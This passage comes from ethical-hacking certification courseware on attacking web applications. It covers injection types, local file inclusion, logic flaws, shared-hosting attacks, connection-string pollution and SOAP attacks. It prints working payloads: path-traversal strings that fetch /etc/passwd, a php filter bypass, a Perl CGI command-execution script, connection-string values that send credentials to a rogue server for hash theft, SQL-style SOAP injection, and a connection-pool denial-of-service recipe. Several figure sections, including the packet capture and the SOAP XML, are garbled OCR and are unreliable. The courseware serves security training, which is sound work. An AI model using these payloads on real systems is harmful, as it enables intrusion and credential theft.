Ethernet I[. Src: NS·HL8· PhysServer •21_Sd: 23:ae:99 (82 : 15: Sd : 23 :ae :99) . Ost: NS· hL8•PhysServer •2LSd : 23 :u : 98 (02:15:Sd : 23: ae:98)
, lnterMt Protocol Vernon 4, Sre : 18.18. 1 . 13, Ost : Ul. 18.1 . 19
► Transausion control Protocol, Src Port : 59666, Ost Port: 88, S : 1. Ack: 1, Len : 377
rtu:tl.,.an,rtr Protocot
, G£T / HTTP/1. l\r\n
Host : WM.110v1escope. coa\ r\n
User -Agent : lloulla/5.i (WJ.ndWS NT 18. G; rv:78 . 0) Geeko/20100101 Hrerox/78 .8\ r \ n
Acct pt: toxtt nt•I, appucauont xnt• H cat , appucau ontxal ;q:8 .9, .1Nget we1>p, • / ' ;q: 0.8\r\11
Acc•pt•Language : ~ · US# eniq=&. S\ r\n
Accept -Encodln9 : gzlp, deflatt\r \ n
ONT : 1\ r\n
connect on : tee • \lve\ r\n

\ r\n
lf:ul\ request URl : http ://www. nov1escope .c0V )
-~IIP requtsc _l t SJ ___
016G 69 76 6S 8d ea
0170
0180
pgradl• I
Requests: 1·· · ·
0 7' Cookie: Character strong Packets 934 O,splayt'd II (1 2'1') Profile Oefault

Figure 14.77: Screenshot of Wireshark

Module 14 Page 2059 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibit ed .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Perform Injection/Input Validation Attacks

Supply crafted malicious input that is syntactically correct according to the interpreted language being used to break
application's normal intended use

Web Scripts Injection

LDAP Injection
8 If the user input is used in dynamically executed code, enter crafted
8 Take adva ntage of non-validat ed web application input vulnerabilities to
input that breaks the intended data context and executes commands
pass LOAP filters t o obtain direct access to databases
on the server

OS Commands Injection XPath Injection

8 Exploit operating systems by e ntering malicious codes in input fields if 8 Enter malicious strings in input fields to manipulate t he XPath query so
applications utilize user input in a system-level command t hat it interferes with the application's logic

SMTP Injection Buffer Overflow

e Inj ect arbitrary SMTP commands int o an application and SMTP 8 Injects a large amount of bogus data beyond the capacity of the input
server conversation to generate large volumes of spam email field

SQL Injection File Injection

e Ent er a series of malicious SQL queries into input fields to directly 8 Injects malicious files by exploiting "dynamic file include" mechanisms in
manipulate the database web applications

Note : For complete coverage of SQL Injection co nce pts and t echniq ues, refer to Module 15: SQL Injection

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Perform Local File Inclusion (LFI)

Local File Inclusion (LFI) vulnerabilities enable attackers to add their own files on a server via a web browser

An LFI vulnerability occurs when an application adds files w ithout proper validation of inputs, thereby enabling
the attacker to modify t he input and embed path traversal characters

Evade added .php and other extensions orthe file Bypassing .php execution

8 File extensions are added using PHP code: 8 An LFI vulnerability can read .txt files, but not .php files,
$file = $_GET[ ' page'] ; beca use .php fi les get executed by the server, and its f ile-
ending comprises some code
require($file .". php" ) ;
8 If an attacker tries to inse rt null -byte (%00) to end of the
8 Evade .php by usi ng a built-in php filter as shown below:
attack string, the .php ca n be eas ily evaded
http ://xyz.com/page = .. / .. / . . / .. / .. / .. /etc/p http://x yz.com/index . php?page=php:/ / filt
asswd%00 er / conv ert . b a se64 - encode/ r esource=index
8 Another method to evade the added php is to add a
question mark (?) to the attack st ring
http ://xyz .com/page = . . / . . / . . / . . / .. / . . / etc/p
asswd?

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Perform Injection/Input Validation Attacks

Injection attacks are very common in web applications. They exploit the vulnerable input
validation mechanism implemented by the web application. There are many types of injection
attacks, such as web script injection, OS command injection, SMTP injection, LDAP injection,
and XPath injection. Another frequently occurring attack is an SQL injection attack.

Module 14 Page 2060 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Injection frequently takes place when a browser sends user-provided data to the interpreter as
part of a command or query. For launching an injection attack, attackers supply crafted data
that tricks the interpreter into executing unintended commands or queries. Because of these
injection flaws, attackers can easily read, create, update, and remove any arbitrary data
available to the application. In some cases, attackers can even bypass a deeply nested firewall
environment and take complete control of the application and its underlying system.
Injection Attacks/Input Validation Attacks

To perform injection attacks, supply crafted malicious input that is syntactically correct
according to the interpreted language being used to break the application's normal intended
operation .
Some ways to perform injection attacks are described below:
• Web Scripts Injection: If the user input is used into dynamically execute code, enter
crafted input that breaks the intended data context and executes commands on the
server.
• OS Commands Injection: Exploit operating systems by entering malicious code in input
fields if applications utilize user input in a system-level command.
• SMTP Injection: Inject arbitrary SMTP commands into applications and SMTP server
conversations to generate large volumes of spam email.
• SQL Injection: Enter a series of malicious SQL queries into input fields to directly
manipulate the database.
• LDAP Injection: Take advantage of non-validated web application input vulnerabilities to
pass LDAP filters to obtain direct access to databases.
• XPath Injection: Enter malicious strings in input fields to manipulate the XPath query so
that it interferes with the application's logic.
■ Buffer Overflow: Inject a large amount of bogus data beyond the capacity of the input
field.
• File Injection: Inject malicious files by exploiting "dynamic file include" mechanisms in
web applications.
■ Canonicalization: Manipulate variables that reference files with " dot-dot-slash (../)" to
access restricted directories in the application.
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15:
SQL Injection.
Perform Local File Inclusion (LFI)

Local file inclusion (LFI) vulnerability enables attackers to add their own files on a server via a
web browser. Such vulnerability arises when an application adds files without proper validation
of inputs, thereby enabling the attacker to modify the input and embed path traversal
characters.

Module 14 Page 2061 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

LFI vulnerability is often triggered in PHP-based websites. Simple PHP code susceptible to LFI is
given below. Attackers can insert the URL parameter into require() without proper validation.
$file= $_GET['page'];
require($file);
In this case, an attacker can just insert this string and fetch the /etc/passwd file using the
following URL:
http://xyz . com/page= . . / .. / .. / .. / . . / .. /etc/passwd
• Evade added .php and other extensions of the file

In general, file extensions are added using PHP code as follows:

$file= $_GET['page'];
require($file . ".php");
Now, php is appended to the file name, which means the user cannot find the required
file because file / etc/passwd. php does not exist. If an attacker tries to insert null
bytes (%00) at the end of the attack string, the .php can be easily evaded :
http://xyz.com/page= . . / .. / .. / .. / . . / . . /etc/passwd%00
Another method to evade the added php is to add a question mark (?) to the attack
string:
http://xyz.com/page= . . / . . / . . / .. / .. / . . /etc/passwd?
• Bypassing .php execution

LFI vulnerability can read .txt files but not .php files because they are executed by the
server and their file-ending comprises some code. This can be evaded using a built-in
php filter as follows:
http : //xyz.com/index.php?page=php : //filter/convert.base64-
encode/resource=index
Here, the php filter is used to convert everything into the Base64 format. Now, the
entire page is Base64-encoded, which can be decoded and saved in a text file and
executed:
base64 -d savefile.php

Module 14 Page 2062 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attack Application Logic Flaws

Most application flaws occur due to the negligence and false assumptions of web developers

Completely examine the web applications to identify logic flaws for exploitation

Use tools like Burp Suite to manipulate the requests to the web applications

Retail Web Application Logic Flaw Exploitation Scenario

a
Retail Website Retail Website

~.
' [ Select Product

' I
I
I
I
[,;. ,.
• I''"" ,,,...., I
I
1
Finalize Order o,..,

Normal User JI P,omd to pay L, 1 [ P,om dtopay ~ I Attacker

_ , 1 Delmy DetalS ::::JJ • IDelv"Y 0e1a;• dJ
Normal User completing the Attacker identifying the application logic flaw
order process sequentially and skipping the "Proceed to pay" stage by
manipulating the requests to the application

Copynght Cl by EC-CIUIR:11 All Rights Reserved Reproduction IS Strictly Prohibited

Attack Application Logic Flaws

In all web applications, a vast amount of logic is applied at every level. The implementation of
some logic can be vulnerable to various attacks that will not be noticeable. Most attackers
mainly focus on high-level attacks such as SQL Injection, and XSS scripting, since they have
easily recognizable signatures. By contrast, application logic flaws are not associated with any
common signatures, making the application logic flaws more difficult to identify. Manually
testing of vulnerability scanners cannot identify this type of flaw, which enables attackers to
exploit such flaws to cause severe damage to the web applications.
Most application flaws arise from the negligence and false assumptions of developers.
Application logic flaws vary among different types of web applications and are not restricted to
a particular flaw. Acquiring knowledge on previously exploited applications with common logic
flaws can provide appropriate information on how to approach exploiting flaws in application
logic.
A common scenario illustrating the exploitation of application logic flaws by attackers is
described below:
■ Scenario: Identify and exploit logic flaws in retail web applications

In most retail web applications, the process of placing an order includes selecting the
product, finalizing the order, providing payment details, and providing delivery details.
The developer assumes that any customer would follow all the levels in a sequence as
designed. Identify such applications, and using proxy tools such as Burp Suite, attempt
to control the requests sent to the web application. Furthermore, attempt to bypass the
third stage, i.e., jump from the second stage to the fourth stage by manipulating the
requests. This type of attack is called forced browsing. This flaw enables the attacker to

Module 14 Page 2063 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

avoid paying the product price and receive the product at the delivery address. It can
result in severe financial losses if an attacker intends to exploit it on a large scale.

-
Retail Website

..__ _ _..,11..__ _ _ _ _ ___,1

Retail Website

----
- ___,I I...____ A
J!!
__,,
I

Normal User
•

•
[ Select Product

•
[ Finalize Order

•
[ Proceed to pay

[ Delivery Details
7
l
• [Select Product

1[ Fin~
[:~r=
•
:c:=::=
:~=P•Y===---]~
•
[ Delivery Details ]

Normal User completing the Attacker identifying the application logic flaw
order process sequentially and skipping the " Proceed to pay" stage by
manipulating the requests to the application

Figure 14.78: Screenshot displaying web application logic flaw exploitation

Module 14 Page 2064 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attack Shared Environments

Organizations leverage third-party service providers for hosting and maintaining their web applications and relevant web
infrastructure
For example, a malicious client of the service provider may try to compromise the security of another organization's w eb
application, or a client may deploy a vulnerable web application that exposes and compromises the web applications of
other organization s

Attacks on the access mechanism

8 Organizations use an administrative web interface for configuring and managing web applications from a remote location
8 Check whether the remote access mechanism has any unpatched vulnerabilities or configuration errors that can be exploited
8 Check whether the access privileges are properly separated between clients

Attacks between applications

8 Vulnerabilities existing in one web application may allow attackers to execute malicious script and compromise the security of
other hosted web applications
8 For example, an SQL injection vulnerabi lity in one application may allow attackers to run arbitrary SQL commands and queries
to retrieve data in the shared environment

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Attack Shared Environments

Nowadays, organizations leverage third-party service providers for hosting and maintaining
their web applications and relevant web infrastructure. These service providers provide services
to multiple clients and host their web applications parallelly using the same infrastructure. This
approach leads to many threats and attacks against web applications. For example, a malicious
client of the service provider may try to compromise the security of another organization's web
application or a client may deploy a vulnerable web application that paves the way to
compromise other organizations' web applications.
The following attacks can be performed on shared environments:
■ Attacks on the access mechanism
The application service provider provides an administrative web interface to the
organizations for configuring and managing the web application and its database from a
remote location. This remote access mechanism is vulnerable to various attacks.
o Check whether the remote access mechanism has any unpatched vulnerabilities or
configuration errors that can be exploited. Attackers exploit such vulnerabilities to
capture credentials and gain access to the web application and its database.
o Check whether the access privileges are properly separated between clients. For
example, a poor configuration may give customers shell access instead of file access.
This may allow attackers to access sensitive files and data stored on the web servers.

Module 14 Page 2065 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

■ Attacks between applications

Vulnerabilities existing in one web application may allow attackers to execute malicious
scripts and compromise the security of other hosted web applications. For example, the
following script allows attackers to execute commands remotely:
#!/usr/bin/perl
use strict ;
use CGI qw(:standard escapeHTML);
print header, start_html ('"');
if (param()) {my $command = param("cmmd");
$command= ' $command ' ;
print "$command\n";}
else {print start_form() ; textfield("command");}
print end_html;
By accessing the abovementioned script over the Internet, attackers can execute OS
commands such as whoami.
Furthermore, a vulnerable web application can be exploited to compromise the security
of other web applications. For example, an SQL injection vulnerability in one application
may allow attackers to run arbitrary SQL commands and queries to retrieve data in the
shared environment and manipulate the data of other applications.

Module 14 Page 2066 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attack Database Connectivity

Database connection strings are used to connect applications to database engines

Example of a common connection string used to connect to a Microsoft SQL Server database:
"Data Source=Server, Port ; Network Library=DBMSSOCN ; Initial Catalog=DataBase ; User
ID=Username; Password=pwd;"

Database connectivity attacks exploit the way applications connect to the database instead of abusing database
queries

Types of Data Connectivity Attacks

m Connection String Injection

m Connection String Parameter Pollution (CSPP) Attacks

m Connection Pool DoS

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Connection String Injection

In a delegated authentication environment, inject parameters in a connection string by appending them with the
semicolon(;) character

A connection string injection attack can occur when dynamic string concatenation is used to build connection strings
based on user input

Before Injection

"Data Source=Server,Port ; Network Library=DBMSSOCN ; Initial Catalog=DataBase;

User ID=Username; Password=pwd;"

After Injection

"Data Source=Server , Port ; Network Library=DBMSSOCN ; Initial Catalog=DataBase;

User ID=Usernarne ; Password=pwd; Encryption=off"

~ When the connection string is populated, the Encryption value will be added to the previously configured set of parameters

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2067 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Connection String Parameter Pollution (CSPP) Attacks

Try to overwrite parameter values in the connection string to steal user IDs and to hijack web credentials

Hash Stealing Port Scanning Hijacking Web Credentials

e Replace the value of the Data Source
parameter with that of a Rogue
Microsoft SQL Server connected to
the Internet running a sniffer
e Data s ource = myServer; initial
c a t a log= dbl ; integrated
security=no ; user id= ; Data
Source=Rogue Server ; Password=;
Integrated Security=true ;
e Sniff Windows credentials (password
hashes) when the application uses its
Windows credentials to attempt a
connection to Rogue_Server
e Try to connect to different ports by
changing the value and seeing the
error messages obtai ned
e Data source= myServer;
initia l c a t a log= dbl ;
integrated security=no; user
id= ; Data Source=Target
Server, Target Port=443 ;
Password= ; Integr ated
Secur ity=true ;
e Try to connect to the databa se by
using a Web Application System
account instead of using credentials
that would be provided to a user
e Data source= myServer;
initial cata log= dbl ;
integrated security=no; user
id= ; Data Source=Target Server ,
Target Port ; Password=;
I ntegr ated Security=t:rue ;

Copynght Cl by tc-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Connection Pool DoS

Examine the connection pooling settings of the application, construct a large malicious
SQL query, and run multiple queries simultaneously to consume all connectio ns in the
connection pool, cau sing database queries to fail for legitimate users

Example:
e In ASP.NET, the default ma ximum allowed connections in the pool are 100 and the
timeout is 30 seconds

Thus, run 100 multiple queries, each with an execution time of 30+ seconds, within
30 seconds to cause a connection pool Dos to prevent others fro m being able to use
the database-re lated parts of the application

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Attack Database Connectivity

Database connection strings are used to connect applications to database engines. In these
attacks, attackers target a database connection that forms a link between a database server
and its client software. A web application establishes a connection with the database by
providing a driver with a connection string that holds the address of a specific database or
server and offers instance and user authentication credentials.

Module 14 Page 2068 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

For example:
Server=sql_box; Database=Common; User ID=uid; Pwd=password;
Attacking data connectivity can result in unauthorized control over the database. Attacks on
data connectivity provide attackers with access to sensitive database information. Database
connectivity attacks exploit the way in which applications connect to the database instead of
abusing database queries.
For this purpose, use methods such as connection string injection attack, hash stealing, port
scanning, and hijacking web credentials.
The following is an example of a common connection string used to connect to a Microsoft SQL
Server database:
"Data Source=Server, Port; Network Library=DBMSSOCN; Initial
Catalog=DataBase; User ID=Username; Password=pwd;"
Data connectivity attacks are of the following types :

■ Connection String Injection: In a delegated authentication environment, attackers inject

parameters in a connection string by appending them with a semicolon. This can occur
when dynamic string concatenation is used to build connection strings according to the
user input.
■ Connection String Parameter Pollution (CSPP) Attacks: Attackers overwrite parameter
values in the connection string.
■ Connection Pool DoS: Attackers examine the connection pooling settings of the target
application, construct a large malicious SQL query, and run multiple queries
simultaneously to consume all the connections in the connection pool, causing database
queries to fail for legitimate users.
Connection String Injection

A connection string injection attack occurs when the server uses dynamic string concatenation
to build connection strings based on the user input. If the server does not validate the string
and does not allow the malicious text or characters to escape, an attacker can potentially
access sensitive data or other resources on the server. For example, an attacker could mount an
attack by supplying a semicolon and appending an additional value. The attacker parses the
connection string using the "last one wins" algorithm and substitutes a legitimate value with a
hostile input.
The connection string builder classes can eliminate guesswork and protect the server from
syntax errors and security vulnerabilities. They provide methods and properties corresponding
to known key/value pairs permitted by each data provider. Each class maintains a fixed
collection of synonyms and can translate a synonym into the corresponding well-known key
name. The server checks for valid key/value pairs and an invalid pair throws an exception . In
addition, it handles the injected values in a safe manner.
The attackers can easily inject parameters by simply adding a semicolon (";") using connection
string injection techniques in a delegated authentication environment.

Module 14 Page 2069 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

In the following example, the system asks the user to give a username and password for
creating a connection string. Here, the attacker enters the password as "pwd; Encryption=off";
this means that the attacker has voided the encryption system. When the connection string is
populated, the encryption value will be added to the previously configured set of parameters.

Before Injection
" Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase ;
User ID=Username ; Password=pwd ;"

After Injection
" Data Sourc e=Server,Port ; Network Library=DBMSSOCN ; Initial Catalog=DataBase ;
User ID=Us ername ; Password=pwd ; Encrypt1.on=off"

Figure 14.79: Screenshot displaying connection string injection - before and after

Connection String Parameter Pollution (CSPP) Attacks

The server uses connection strings to connect applications to database engines. Connection
string parameter pollution (CSPP) techniques allow an attacker to specifically exploit the
semicolon-delimited database connection strings that are constructed dynamically based on
the user inputs from web applications.
In CSPP attacks, attackers overwrite parameter values in the connection string to steal user IDs
and hijack web credentials.
■ Hash Stealing
Replaces the value of the Data Source parameter with that of a Rogue Microsoft SQL
Server and sets the values of username, data source, and integrated security as follows:
User Value: ; Data Source = Rogue_Server Password Value: ; Integrated
Security= true.

Thus, the resulting connecting string would be:

Data source= myServer ; initial catalog= dbl; integrated security=no ;
user ID=;Data Source=Rogue Server; Password=; Integrated Security=true;

Here, the parameters "DataSource" and "lntegratedSecurity" are overwritten. Thus, the
application's built-in drivers will use the last set of values instead of the previous ones.
Now, when the Microsoft SQL Server tries to connect to the rogue server, the sniffer
running in the rogue server sniffs the window's credentials.
■ Port Scanning
Try to connect to different ports by changing the value and seeing the error messages
obtained.
lnjectuser_Value : ; Data Source =Target_Server, Target_Port
Password_Value: ; Integrated Security= true

The resulting connection string would be :

Module 14 Page 2070 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Data source= myServer; initial catalog= dbl ; integrated security=no ;

user id=;Data Source=Target Server, Target Port ; Password= ; Integrated
Security=true ;

Here, the connection string will take the last set "DataSource" parameter; the web
application will try to connect to the "TargetPort" port on the "TargetServer" machine.
Thus, you can perform a port scan by noticing different error messages.
• Hijacking Web Credentials

Try to connect to the database using the web application system account instead of a
user-provided set of credentials.
lnjectuser_Value: ; Data Source =Target_Server
Password_Value: ; Integrated Security= true

The resulting connection string is:

Data source= myServer; initial catalog= dbl; integrated security=no ;
user id= ; Data Source=Target Server, Target Port; Password= ; Integrated
Security=true ;

Here, it overwrites the "integratedsecurity" parameter with a value equal to "true."

Thus, it will allow you to connect to the database with the system account with which
the web application runs.
Connection Pool Dos

Examine the connection pooling settings of the application, construct a large malicious SQL
query, and run multiple queries simultaneously to consume all the connections in the
connection pool, causing database queries to fail for legitimate users.
For example, by default, in ASP.NET, the maximum number of allowed connections in the pool
is 100 and the timeout is 30 seconds. Thus, run 100 queries with an execution time of 30+
seconds within 30 seconds to cause a connection pool Dos such that no one else would be able
to use the database-related parts of the application.

Module 14 Page 2071 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attack Web Application Client

Interact with server-side applications in unexpected ways to perform malicious actions against the end
users and access unauthorized data

[! Cross-Site Scripting
~ GI Redirection Attacks
~
lm HTTP Header Injection
m Frame Injection

l• Request Forgery Attack

] 6 Session Fixation
]
lm Privacy Attacks
m ActiveX Attacks
J
Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Attack Web Application Client

Attacks performed on a server-side application infect the client-side application when the latter
interacts with malicious servers or processes malicious data. Attacks on the client side occur
when the client establishes a connection with the server. If there is no connection between the
client and the server, then there is no risk, because the server cannot pass malicious data to the
client.
Consider a client-side attack in which an infected web page targets a specific browser weakness
and exploits it successfully. Consequently, the malicious server gains unauthorized control of
the client system. Attackers interact with the server-side applications in unexpected ways to
perform malicious actions against the end users and access unauthorized data.
Some of the methods that attackers use to perform malicious attacks are discussed below.
■ Cross-Site Scripting: An attacker bypasses the clients' ID's security mechanism, obtains
access privileges, and then injects malicious scripts into the web pages of a website.
These malicious scripts can even rewrite the HTML content of the website .
■ HTTP Header Injection: Attackers split an HTTP response into multiple responses by
injecting a malicious response in an HTTP header. Thus, they can deface websites,
poison the cache, and trigger cross-site scripting.
■ Request Forgery Attack: In a request forgery attack, attackers exploit the trust of a
website or web application on a user's browser. The attack works by including a link on
a page, which takes the user to an authenticated website.
■ Privacy Attacks: A privacy attack involves tracking performed with the help of a remote
site by employing a leaked persistent browser state.

Module 14 Page 2072 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reprod uction is St rictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Redirection Attacks: Attackers develop code and links that resemble a legitimate site
that a user wants to visit; however, the URL redirects the user to a malicious website on
which attackers could potentially obtain the user's credentials and other sensitive
information.
■ Frame Injection: When scripts do not validate their input, attackers inject code through
frames. This affects all the browsers and scripts that do not validate untrusted input.
These vulnerabilities occur in HTML pages with frames. Another reason for this
vulnerability is that web browsers support frame editing.
■ Session Fixation : Session fixation helps attackers hijack valid user sessions. They
authenticate themselves using a known session ID and then use the known session ID to
hijack a user-validated session. Thus, attackers trick users and access a genuine web
server using an existing session ID value.
■ ActiveX Attacks: Attackers lure victims via email or via a link that is constructed such
that the loopholes of remote execution code become accessible, allowing the attackers
to obtain access privileges equal to those of authorized users.

Module 14 Page 2073 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attack Web Services

Web services work atop legacy web applications, and any attack on a web service w ill immediately expo se an underlying
application's business and logic vulnerabilities for various attacks

f" ............ ..... .......i,. ~............ .........► ~- · ~.......................➔ ~

I == I ~
Package Application Database System

........ ..... .......> ~

~
........ .... . . .......i,. El.--
Custom Application Application Management Server
Web Service
Attacker

. . . . . .... . . . .. . .► ~
Client

~--··········· ..... ·· ··· ···► ~.......................► i; -4:

Database Ide ntity Management Server

SOAP Injection, WSDL Probing Information Leakage, Database Attacks,

Web Services Application Logic
XML Injection Attacks DoSAttacks
Attacks

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Services Probing Attacks

In the first step, trap the WSDL document from web service traffic and analyze it to determine the purpose of the
application an d ident ify its functions, entry points, and message types

Create a set of valid requests by selecting a set of operations and fo rmulating request messages according to the rules
of the XM L Schema that can be submitted to the web service

Use these requests to include malicious contents in SOAP requests and analyze errors to gain a deeper understanding
of potential security weaknesses

<1xml version=NI.O· encodi~=" U Tf.S'standalone= ' <?:>o:ml version:" 1, o• e ncodlng=•ud-S- ?>

no'?> • <Soap: Envelope JUT'llns: soap=•http://sche mas.xmlsoap.org/soap/ enveloper
- <SOAP-ENV: Envelope }(mlns: M'llns: xsF"http://www.w3 .org/2001/XMLSchem -- 1nstl'lnce •
SOAPS0K1:Nhttp://www.w3.otg/2001/XMUChema' M'llns:)ISd:-'http://www.wl.org/200 V XMl5cheml'r>
xmlns: SOAPSOK2:"http ://WWW .w3 .otg/200 - <Soap: Body.>
• <Soap:Fauh>
1/XMLSchem.c> inst.once"
xmkls: SOAPSOK3: "http://schemas .xmlso.op
.a<g/soap/ encodngf x mlns: SOAPfNV=
' http://schemas .)lmtsoap.org/soap/ envelope/>
· <SOAP· ENV:Body> [[]
<fauhcode >soap:Server</faultcode>
<fauhstrinpSystem. Web Services Protocols .5oapfltceptlon : -
- .D.... -C.-••tltlt'" ~ - 4..... _ - , It_., • .,._.....,._
. B4r.1u- .-..-o--""o• ...u--•ic.-••"'I
i:::::.:~~c.:==;•:-=-••IT•lf.S_,.lo....l
- -
M•---
,. _ .. , _ - •
• ' J l l • I II

................... ..............·► -=.::::::-~~:·:a:::.!!::~=::...-.=-:-..!~--=·==-=-- -

Attacke r inject
arbitrary
►
• <SOAPSOK4: Getl'rocUctlnformatlonB'l',lame
)lmkls: SOAPSOK4:' ~ : ' 'sfaustlao/ProducUnfof>
<SOAPSDK4: name>' </SOAPSOK4: name>
<SOAPSOK4: uid>312 - 111 - 8543</SOAPSOK4: uid>
Server throws
an error
- •~ - - . "",.. ~ ..
- i atS.,-.- - - • - M l.h0<u•110o-0
s- .o-----r.•----iu-•111-•
• -•1--IDM«- .a..-, t~""""-
- -- """- • """"- _.. • -.....- ...1-&.1Preo1..,w_,.,.,..."'""4""~• - . i....,. ...,""-
character(') in <SOAPSDK4: password> S648</SOAPSOK4: password> _.... -1ni1•--...,. - • - •··•</faultst rinp
Attacker <det~I />
</SOAPS OK 4 : GetProduc t In forma tl O n By Name>
t he input field </SO!i!fJ: fault>
</SOAP-ENV: Body>
</SO!i!fJ:8ody.>
</SOAP-ENV: Envelope> </s004>: Envelope>

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2074 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Service Attacks: SOAP Injection

[ Inject malicious query strings in the user input field to bypass web services authentication mechanisms and
access backend databases

This attack works similarly to SQL Injection attacks

Server Response
<?xml ver s ion="!. 0" encoding:"utf-8' ?>
Account Login - < s oap: Envelope xmlns: s oap=' ' http://schemas

Use ma me r % I < ....................

. xmlsoap. org/ soap/anvalopa /"
xmlns: xsi • ' http: //www.w3.org/2001/XMISchama-
instance'
PasswCN"d [ ' or 1,. 1 or blah: '] ~ xmlns: x sds' http: //www.w3.org/2001 /XMI.Schana' >
- <soap:Body>
- <Getproduct1nfonnationByNameResponse
xmlns="ht t:p : / /cartifiadhackar /Productinfo/ ">
- <GetProduct1nfonna.tionByNameResult>
<productid> 25 </productid>
<product Name >PaintinglO l</productName >
<productQuantity>J</productQuanti t y >
<productPri ce> 1500</productPrice>
</GetProductlnformationByNameResult>
</GetProductlnformationByNameResponsa>
</soap: Body>
</soap: Envelope>

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Service Attacks: SOAPAction Spoofing

WS-Attacker

Every SOAP request contains an operation

that is executed by the application and is
included as the first child element in the
SOAP Body

SOAPAction is an additional HTTP header

used when SOAP messages are
transmitted using HTTP

This header informs the receiving web

service about the operation present in the
SOAP body without the need to perform
XML parsing

Attackers use tool s such as WS-Attacker to

manipulate th e operations included in the
--~
o'mef>ocl(1e - •! - h-empty8(W>BO<ly)
lo loulu,..,. bul_d_ecllJ11<:- .., N:PII'

lo loulu -. bul-ddtc ,.,_,. an ,

SOAPAction headers

https://github.com

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2075 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Service Attacks: WS-Address Spoofing

WS-address provides additional routing information in the SOAP header to support asynchronous communication

In a WS-address spoofing attack, an attacker sends a SOAP message cont aining fake WS-address information to the
server. The <ReplyTo> header consist s of the address of the endpoint selected by the att acker rather than the address
of the web service client

-
Re gular SOAP traffic betwe e n WS client and s erver Un-requeste d SOAP traffic re ceive d by WS client

Attacker
~ <'-
- SOAP ReplyTo

SOAP
ReplyTo SOAP m essage
<En-1op>
r 07:
:

~.:.
<H==~~> ~-······· ....]
<Addre• •> EC-=►
SOAP

EL.-- SOAP

Web Service Client

, , .. ,, .. , , .. , , ..;,. http : //cl.i• nt
< /Addn.ss>
</ReplyTo>
</K•ader>
Web Service Server
Web Service dient Web Service Server <Body>

